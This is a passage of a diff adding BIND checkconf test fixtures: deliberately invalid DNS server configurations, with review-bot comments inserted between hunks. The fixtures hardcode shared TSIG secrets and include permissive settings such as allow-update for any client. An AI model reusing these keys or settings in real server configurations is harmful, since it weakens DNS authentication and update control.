+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "default";
+ key-directory ".";
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "insecure";
+ key-directory ".";
+ file "example2.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in
new file mode 100644
index 0000000..699c193
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-keydir2.conf.in
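Review bot: The two `secret` values in the `key` blocks of bad-kasp-keydir1.conf.in are committed with no marker that they are throw-away test keys, and the same pair is repeated in bad-kasp-keydir2.conf.in through bad-kasp-keydir5.conf.in. A comment above the first key block, e.g. `/* Test-only TSIG keys used to select the view; not for production use. */`, would let secret-scanner findings on this tree be triaged quickly. It would also make it obvious to anyone copying a view layout from these fixtures that the keys must be replaced.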
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * No key-directory is set, so the default is used.
+ * Should fail because the same zone in different views is using different
+ * DNSSEC policies.
+ */
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "default";
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "insecure";
+ file "example2.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in
new file mode 100644
index 0000000..0dbd7e2
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-keydir3.conf.in
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The zone in view "example1" inherits the key directory value from "options",
+ * but in view "example2" sets the key directory to the same value. This should
+ * be detected as an error because the zone is using different DNSSEC policies
+ * and should thus use different key directories.
+ */
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+options {
+ key-directory "keys";
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ zone "example.net" {
+ type primary;
+ /* key-directory inherited from options. */
+ dnssec-policy "default";
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "insecure";
+ key-directory "keys";
+ file "example2.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in
new file mode 100644
index 0000000..af4a8f9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-keydir4.conf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The zone inherits the key-directory from the "view" level. Both views use the
+ * same key-directory, but the zone uses a different DNSSEC policy per view.
+ * This is a configuration error.
+ */
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ key-directory "keys";
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "default";
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ key-directory "keys";
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "insecure";
+ file "example2.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in
new file mode 100644
index 0000000..1cca608
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-keydir5.conf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * In one view, the zone inherits the key-directory from the "view" level, while
+ * in the other it is set explicitly at the "zone" level. In both cases, the
+ * same key-directory is used, but the zone uses a different DNSSEC policy per
+ * view. This is a configuration error.
+ */
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
+ secret "4xILSZQnuO1UKubXHkYUsvBRPu8=";
+};
+
+view "example1" {
+ match-clients { key "keyforview1"; };
+
+ key-directory "keys";
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "default";
+ file "example1.db";
+ };
+};
+
+view "example2" {
+ match-clients { key "keyforview2"; };
+
+ zone "example.net" {
+ type primary;
+ dnssec-policy "insecure";
+ key-directory "keys";
+ file "example2.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf
new file mode 100644
index 0000000..12a26d3
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited-view.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The dnssec-policy is not defined. Should also be caught if it is inherited.
+ */
+
+view "test" {
+ dnssec-policy "notdefined";
+
+ zone "example.net" {
+ type primary;
+ file "example.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf
new file mode 100644
index 0000000..48514ac
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-policy-undefined-inherited.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The dnssec-policy is not defined. Should also be caught if it is inherited.
+ */
+
+options {
+ dnssec-policy "notdefined";
+};
+
+zone "example.net" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp10.conf b/bin/tests/system/checkconf/bad-kasp10.conf
new file mode 100644
index 0000000..3088fc9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp10.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone with dnssec-policy 'none', one zone with dnssec-policy 'insecure',
+// both using the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "none";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp11.conf b/bin/tests/system/checkconf/bad-kasp11.conf
new file mode 100644
index 0000000..7c0b0e9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp11.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone with a dnssec-policy, the other with allow-update,
+// with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ allow-update { any; };
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp12.conf b/bin/tests/system/checkconf/bad-kasp12.conf
new file mode 100644
index 0000000..67b8c85
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp12.conf
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone with a dnssec-policy, the other with update-policy,
+// with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ update-policy {
+ grant * self * TXT;
+ };
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp13.conf b/bin/tests/system/checkconf/bad-kasp13.conf
new file mode 100644
index 0000000..e9078dd
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp13.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone transitioning to insecure, the other with allow-update,
+// with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ allow-update { any; };
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp2.conf b/bin/tests/system/checkconf/bad-kasp2.conf
new file mode 100644
index 0000000..7f27906
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp2.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "good-kasp.conf";
+
+// Bad zone configuration because this has dnssec-policy and other DNSSEC sign
+// configuration options (auto-dnssec).
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "test";
+ auto-dnssec maintain;
+ allow-update { any; };
+};
diff --git a/bin/tests/system/checkconf/bad-kasp3.conf b/bin/tests/system/checkconf/bad-kasp3.conf
new file mode 100644
index 0000000..9e0c4b9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp3.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "good-kasp.conf";
+
+// Bad zone configuration because this has dnssec-policy with no matching
+// dnssec-policy configuration (good-kasp.conf has "test", zone refers to
+// "nosuchpolicy".
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "nosuchpolicy";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp4.conf b/bin/tests/system/checkconf/bad-kasp4.conf
new file mode 100644
index 0000000..b5aa470
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp4.conf
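Review bot: The comment above the zone in bad-kasp3.conf opens a parenthesis at `(good-kasp.conf has "test", zone refers to` and never closes it, so the explanation of why the file is expected to be rejected reads as unfinished. Close it after the policy name, `// "nosuchpolicy").`. No change to the configuration statements is needed.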
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// Bad kasp configuration because this has an invalid duration for
+// signatures-refresh.
+dnssec-policy "badduration" {
+ signatures-refresh PT20Sabcd;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "badduration";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp6.conf b/bin/tests/system/checkconf/bad-kasp6.conf
new file mode 100644
index 0000000..b05130c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp6.conf
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// Two zones with dnssec-policy with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp7.conf b/bin/tests/system/checkconf/bad-kasp7.conf
new file mode 100644
index 0000000..05734a5
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp7.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// Two zones with dnssec-policy 'insecure' (transitioning to insecure)
+// with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp8.conf b/bin/tests/system/checkconf/bad-kasp8.conf
new file mode 100644
index 0000000..fa27a40
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp8.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone with dnssec-policy, the other zone has 'dnssec-policy none',
+// both with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "none";
+};
+
diff --git a/bin/tests/system/checkconf/bad-kasp9.conf b/bin/tests/system/checkconf/bad-kasp9.conf
new file mode 100644
index 0000000..a76436b
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp9.conf
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// One zone with dnssec-policy, the other zone has 'dnssec-policy insecure'
+// (transitioning to inseure), both with the same zone file.
+
+zone "example1.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
+
+zone "example2.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
+
diff --git a/bin/tests/system/checkconf/bad-keep-response-order.conf b/bin/tests/system/checkconf/bad-keep-response-order.conf
new file mode 100644
index 0000000..a3685d7
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-keep-response-order.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ keep-response-order {
+ does_not_exist;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-ksk-without-zsk.conf b/bin/tests/system/checkconf/bad-ksk-without-zsk.conf
new file mode 100644
index 0000000..66e1b7f
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-ksk-without-zsk.conf
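Review bot: The header comment of bad-kasp9.conf misspells the policy name as `inseure` in `(transitioning to inseure)`. That word is also the literal policy used in the second zone, so a search for "insecure" across the fixtures will not match this file's description. The line should read `// (transitioning to insecure), both with the same zone file.`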
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy ksk-without-zsk {
+ keys {
+ ksk lifetime 30d algorithm 13;
+ };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ dnssec-policy ksk-without-zsk;
+};
diff --git a/bin/tests/system/checkconf/bad-lifetime.conf b/bin/tests/system/checkconf/bad-lifetime.conf
new file mode 100644
index 0000000..f268076
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-lifetime.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ nta-lifetime 8d;
+};
diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf
new file mode 100644
index 0000000..5655a16
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-bogus.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize bogusvalue;
+};
diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf
new file mode 100644
index 0000000..006ca7d
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-toolarge.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize 2048G;
+};
diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf
new file mode 100644
index 0000000..5dd1720
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-toosmall.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize 1;
+};
diff --git a/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf b/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf
new file mode 100644
index 0000000..f1e7b88
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-lmdb-mapsize-unlimited.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ lmdb-mapsize unlimited;
+};
diff --git a/bin/tests/system/checkconf/bad-master-request-ixfr.conf b/bin/tests/system/checkconf/bad-master-request-ixfr.conf
new file mode 100644
index 0000000..19384b3
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-master-request-ixfr.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * request-ixfr clause is not allowed in zone of type master.
+ */
+
+zone dummy {
+ type master;
+ request-ixfr no;
+ file "xxxx";
+};
diff --git a/bin/tests/system/checkconf/bad-masters-dup.conf b/bin/tests/system/checkconf/bad-masters-dup.conf
new file mode 100644
index 0000000..ed761c9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-masters-dup.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.net" {
+ type secondary;
+ primaries { 192.168.1.1; };
+ masters { 192.168.1.2; };
+};
diff --git a/bin/tests/system/checkconf/bad-maxcachettl.conf b/bin/tests/system/checkconf/bad-maxcachettl.conf
new file mode 100644
index 0000000..47f0643
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxcachettl.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ max-cache-ttl 1x;
+};
diff --git a/bin/tests/system/checkconf/bad-maxncachettl-1.conf b/bin/tests/system/checkconf/bad-maxncachettl-1.conf
new file mode 100644
index 0000000..ad852c3
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxncachettl-1.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view one {
+ max-ncache-ttl 1x;
+};
diff --git a/bin/tests/system/checkconf/bad-maxncachettl-2.conf b/bin/tests/system/checkconf/bad-maxncachettl-2.conf
new file mode 100644
index 0000000..ada5c83
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxncachettl-2.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view two {
+ max-ncache-ttl 604801;
+};
diff --git a/bin/tests/system/checkconf/bad-maxncachettl-3.conf b/bin/tests/system/checkconf/bad-maxncachettl-3.conf
new file mode 100644
index 0000000..771a0f3
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxncachettl-3.conf
@@ -0,0 +1,19 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view three {
+ max-ncache-ttl 4000000000;
+};
+view four {
+ max-ncache-ttl -1;
+};
diff --git a/bin/tests/system/checkconf/bad-maxncachettl-4.conf b/bin/tests/system/checkconf/bad-maxncachettl-4.conf
new file mode 100644
index 0000000..d9cd939
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-maxncachettl-4.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view four {
+ max-ncache-ttl -1;
